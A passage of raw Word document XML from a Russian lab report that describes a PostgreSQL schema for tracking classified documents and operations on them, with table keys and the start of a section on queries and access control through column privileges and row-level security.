      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> хранит журнал операций с этими документами. Между таблицами задана связь по номеру документа: каждая операция относится к конкретному документу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F26733C" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Таблица</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> documents </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>содержит</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>атрибуты</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document_number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>responsible_employee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document_content</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>internal_department</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>effective_from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>effective_until</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>secrecy_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Первичным ключом является </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>document_number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Поле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>secrecy_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> используется для отделения несекретных документов от документов с ограничением доступа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305ADE37" w14:textId="788AD08B" w:rsidR="0071636D" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Таблица</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document_operations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>содержит</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>атрибуты</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>employee_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document_number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>change_date</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>operation_description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Первичный ключ составной и включает сотрудника, номер документа и дату изменения. Это позволяет хранить несколько операций по одному документу и различать их по времени выполнения</w:t>
      </w:r>
      <w:r w:rsidR="00572DB0" w:rsidRPr="00572DB0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602EBAF6" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00C2601B">
        <w:t>Таблица 4 – Отношения базы данных первой части</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1705"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="3600"/>
        <w:gridCol w:w="2807"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C2601B" w14:paraId="0BA11F10" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BC76AC5" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Отношение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C580DFD" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Назначение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="491D77A7" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Основные атрибуты</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A842C38" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Ключи</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="22B0BA63" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F315D90" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>documents</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63DF325B" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>Хранение сведений о документах организации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="049BAD1F" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>document_number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>document_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>responsible_employee</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>document_content</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>internal_department</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>effective_from</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>effective_until</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>secrecy_level</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2807" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="634D2C7E" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>document_number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve"> — PK; альтернативный ключ по типу, ответственному, подразделению и дате ввода</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w:rsidRPr="00C2601B" w14:paraId="3ED7BCAC" w14:textId="77777777" w:rsidTr="00C2601B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70EB2EEB" w14:textId="740A1AEC" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>document</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>_</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>operations</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0973EE1A" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>Журнал операций с документами</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F821152" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>employee_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>document_number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>change_date</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>operation_description</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2807" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BDF4144" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>employee_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>document_number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>change_date</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve"> — PK; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>document_number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t xml:space="preserve"> — FK на documents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="006F5797" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02046193" w14:textId="193F8B82" w:rsidR="00903505" w:rsidRDefault="0071636D" w:rsidP="00903505">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071636D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35D7C2D5" wp14:editId="315A3F98">
            <wp:extent cx="4458322" cy="300079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3000794"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D20000B" w14:textId="6A38C971" w:rsidR="00903505" w:rsidRPr="00E34A15" w:rsidRDefault="00903505" w:rsidP="00E34A15">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="00E34A15">
        <w:t xml:space="preserve">Рисунок 1 – </w:t>
      </w:r>
      <w:r w:rsidR="0071636D">
        <w:t>Реляционная схема базы данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C5AB47" w14:textId="77777777" w:rsidR="00160CFD" w:rsidRPr="00160CFD" w:rsidRDefault="00160CFD" w:rsidP="00160CFD"/>
    <w:p w14:paraId="02489EA9" w14:textId="7FAAFD35" w:rsidR="00160CFD" w:rsidRDefault="00572DB0" w:rsidP="00572DB0">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc229005044"/>
      <w:r>
        <w:t>Реализация запросов первой части</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="19A059AF" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:r>
        <w:t>На основании условий лабораторной работы были реализованы три SQL-запроса. Для каждого запроса были заданы параметры, выполнен SQL-код и зафиксирован результат в журнале 10_part1_queries.log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FB6F6B" w14:textId="287458F5" w:rsidR="00903505" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:r>
        <w:t>Первый запрос предназначен для поиска ответственных сотрудников, которые отвечают более чем за один секретный документ заданной степени секретности. В качестве параметра была выбрана степень секретности «секретно».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7BBB13" w14:textId="0BE14583" w:rsidR="00E56B7C" w:rsidRDefault="00E56B7C" w:rsidP="00903505">
      <w:r w:rsidRPr="00E56B7C">
        <w:t xml:space="preserve">Из матрицы следует, что основное разграничение доступа должно выполняться не только на уровне столбцов, но и на уровне строк. Поэтому для реализации были использованы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E56B7C">
        <w:t>столбцовые</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E56B7C">
        <w:t xml:space="preserve"> привилегии </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E56B7C">
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E56B7C">
        <w:t xml:space="preserve"> и политики безопасности строк RLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B7DAC6" w14:textId="63D51D2F" w:rsidR="00C2601B" w:rsidRPr="00B02A76" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
